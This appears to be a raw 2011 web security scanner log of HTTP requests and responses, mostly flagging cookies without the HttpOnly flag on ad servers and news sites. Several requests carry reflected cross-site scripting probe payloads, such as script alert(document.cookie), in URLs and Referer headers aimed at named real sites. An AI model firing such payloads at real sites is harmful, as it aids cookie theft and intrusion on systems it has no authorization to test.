HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:22:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:24 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:14:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2453 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 23:08:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:41:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:03:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:01:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:48:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2453 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 666 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
<script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 HTTP/1.1 Host: events.cbs6albany.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:49:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:49:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <title>Business - BostonHerald ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:49:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:49:19 GMT Content-Length: 32594 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <title>Business - BostonHerald ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP707&valid=NO&set=new&view=quote&ticker= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html;charset=utf-8 Expires: Sat, 29 Jan 2011 04:49:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:49:22 GMT Content-Length: 26005 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <title>Business - BostonHerald ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
SITE=MABOH; Path=/
SECTION=DJSP_COMPLETE; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE HTTP/1.1 Host: hosted.ap.org Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/javascript Vary: Accept-Encoding Expires: Fri, 28 Jan 2011 21:57:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 28 Jan 2011 21:57:28 GMT Connection: close Content-Length: 8304
document.write( '<!--GLOBAL FALSE FOR PROXY-PARTIAL-->'); document.write( '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">'); ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
SITE=MAPIT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lineups/NEWSBRIEF-bulleted.js?SITE=MAPIT&SECTION=HOME HTTP/1.1 Host: hosted.ap.org Proxy-Connection: keep-alive Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE
Response
HTTP/1.1 200 OK Set-Cookie: SITE=MAPIT; Path=/ Set-Cookie: SECTION=HOME; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=61 Date: Sat, 29 Jan 2011 13:40:14 GMT Connection: close Content-Length: 2200
document.write( '<li class="ap-bulleted-headline-2"><a href="http://hosted.ap.org/dynamic/stories/M/ML_EGYPT_PROTEST?SITE=MAPIT&SECTION=HOME&TEMPLATE=DEFAULT">Massive demonstration swells in downtown ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Location: http:// Server: JBird/1.0b Date: Fri, 28 Jan 2011 16:46:03 GMT Connection: close Set-Cookie: c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693
The following cookies were issued by the application and do not have the HttpOnly flag set:
i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693
ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /servlet/ajrotator/63722/0/vj?ajecscp=1296224075221&z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=Aa
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 14:14:34 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Content-Type: application/x-javascript Set-Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/ Set-Cookie: i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693 Set-Cookie: ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/
document.write("<"+"script language=\"JavaScript\">\n"); document.write("var zflag_nid=\"1220\"; var zflag_cid=\"101\"; var zflag_sid=\"69\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zfl ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Location: http:// Server: JBird/1.0b Date: Fri, 28 Jan 2011 16:46:05 GMT Connection: close Set-Cookie: c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693
The following cookies were issued by the application and do not have the HttpOnly flag set:
i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693
ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /servlet/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 14:48:31 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Content-Type: application/x-javascript Set-Cookie: i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693 Set-Cookie: ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/
document.write("<"+"script language=\"JavaScript\">\n"); document.write("var zflag_nid=\"1220\"; var zflag_cid=\"167\"; var zflag_sid=\"126\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zfl ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Location: http:// Server: JBird/1.0b Date: Fri, 28 Jan 2011 17:26:43 GMT Connection: close Set-Cookie: c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689
The following cookies were issued by the application and do not have the HttpOnly flag set:
i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689
ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
